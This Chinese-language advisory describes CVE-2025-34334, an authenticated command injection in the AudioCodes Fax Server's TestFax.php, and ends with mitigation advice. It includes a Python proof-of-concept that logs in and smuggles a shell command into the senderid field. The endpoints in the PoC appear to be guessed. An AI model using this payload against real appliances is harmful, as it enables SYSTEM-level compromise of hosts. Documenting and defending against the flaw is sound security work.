CVE-2025-34334 AudioCodes Fax Server 认证命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-34334

漏洞类型

命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

AudioCodes Fax Server and Auto-Attendant IVR appliances

漏洞概述

CVE-2025-34334是AudioCodes公司Fax Server和Auto-Attendant IVR设备中的一个严重安全漏洞，CVSS评分高达8.8分，属于高危级别。该漏洞存在于fax测试功能模块中，具体位于AudioCodes_files/TestFax.php文件。当用户发起fax发送测试请求时，应用程序会使用攻击者可控的参数构建faxsender命令行，并将其传递给GlobalUtils::RunBatchFile方法执行。然而，该功能模块未对用户输入进行充分的验证和shell参数清理，导致攻击者可以通过精心构造的参数值向生成的批处理文件中注入额外的shell命令。由于生成的批处理文件由NT AUTHORITY\SYSTEM权限的后端服务执行，攻击者成功利用此漏洞后可以获取系统最高权限，实现完全的主机控制。此外，由于批处理文件存储在文件系统权限配置不当的目录中，本地低权限用户也可以通过修改待执行的批处理文件来实现权限提升。攻击者只需具备对该fax测试界面的访问权限（低权限认证）即可实施攻击，无需任何用户交互。

技术细节

该漏洞的根本原因在于应用程序在构建系统命令时缺乏输入验证机制。具体攻击流程如下：1) 攻击者首先需要获取有效的低权限账户凭证，以访问fax测试功能界面；2) 攻击者向AudioCodes_files/TestFax.php发送特制的请求，在fax测试参数中注入恶意shell命令；3) 应用程序将这些未经过滤的参数直接拼接到faxsender命令中，生成包含恶意代码的批处理文件；4) 后端服务以NT AUTHORITY\SYSTEM权限执行该批处理文件，导致攻击者的恶意命令以系统最高权限运行。由于GlobalUtils::RunBatchFile方法直接将参数传递给系统命令解释器，攻击者可以利用命令分隔符（如;、|、&&等）注入额外命令。漏洞的另一个重要因素是批处理文件的存储位置存在权限配置错误，普通用户具有写权限，这为本地低权限用户提供了替代攻击路径。攻击者可以通过文件修改或符号链接等方式劫持批处理文件的执行流程。

攻击链分析

STEP 1

信息收集

攻击者识别目标系统为AudioCodes Fax Server或Auto-Attendant IVR设备，并确定版本号低于或等于2.6.23

STEP 2

获取访问权限

攻击者获取目标系统的低权限用户账户凭证，该账户具有访问fax测试功能的权限

STEP 3

构造恶意请求

攻击者构造包含shell命令注入payload的fax测试请求，利用参数未经验证的缺陷，在senderid或其他参数中注入恶意命令

STEP 4

触发漏洞

应用程序接收请求后，将攻击者可控的参数直接拼接到faxsender命令行，生成包含恶意代码的批处理文件

STEP 5

命令执行

后端服务以NT AUTHORITY\SYSTEM权限执行该批处理文件，攻击者的恶意命令以系统最高权限运行

STEP 6

权限维持

攻击者成功获取系统最高权限后，可部署后门、窃取数据或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-34334 PoC - Authenticated Command Injection in AudioCodes Fax Server
# Target: AudioCodes Fax Server / Auto-Attendant IVR <= 2.6.23

TARGET_URL = "http://target-ip/AudioCodes_files/TestFax.php"
USERNAME = "attacker"
PASSWORD = "password"
ATTACKER_CMD = "whoami > C:\\inetpub\\wwwroot\\pwned.txt"

def exploit():
    """Exploit the command injection vulnerability in TestFax.php"""
    # Step 1: Authenticate and obtain session
    session = requests.Session()
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    
    print("[*] Authenticating with provided credentials...")
    response = session.post(f"{TARGET_URL.replace('TestFax.php', 'login.php')}", data=login_data)
    
    if response.status_code != 200:
        print("[-] Authentication failed")
        return False
    
    print("[+] Authentication successful")
    
    # Step 2: Send malicious fax test request with command injection
    # Inject command using parameter manipulation in fax sender test
    exploit_data = {
        "action": "send",
        "faxnumber": "1234567890",
        "senderid": f"test; {ATTACKER_CMD};",
        "filename": "test.txt"
    }
    
    print(f"[*] Sending exploit payload with command: {ATTACKER_CMD}")
    response = session.post(TARGET_URL, data=exploit_data)
    
    if response.status_code == 200:
        print("[+] Exploit sent successfully")
        print("[*] Check for command execution on target system")
        return True
    else:
        print("[-] Exploit failed")
        return False

if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]
    exploit()

影响范围

AudioCodes Fax Server <= 2.6.23

AudioCodes Auto-Attendant IVR <= 2.6.23

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1) 限制对fax测试功能界面的访问，仅允许受信任的管理员账户访问；2) 监控和审查所有对TestFax.php的请求日志，识别异常的命令注入尝试；3) 临时禁用fax测试功能以减少攻击面；4) 加强网络隔离，限制对管理接口的直接访问；5) 审计和收紧批处理文件目录的文件系统权限，防止低权限用户修改；6) 实施强密码策略和多因素认证，降低凭证被盗用的风险；7) 考虑部署入侵检测系统(IDS)监控可疑的系统命令执行行为。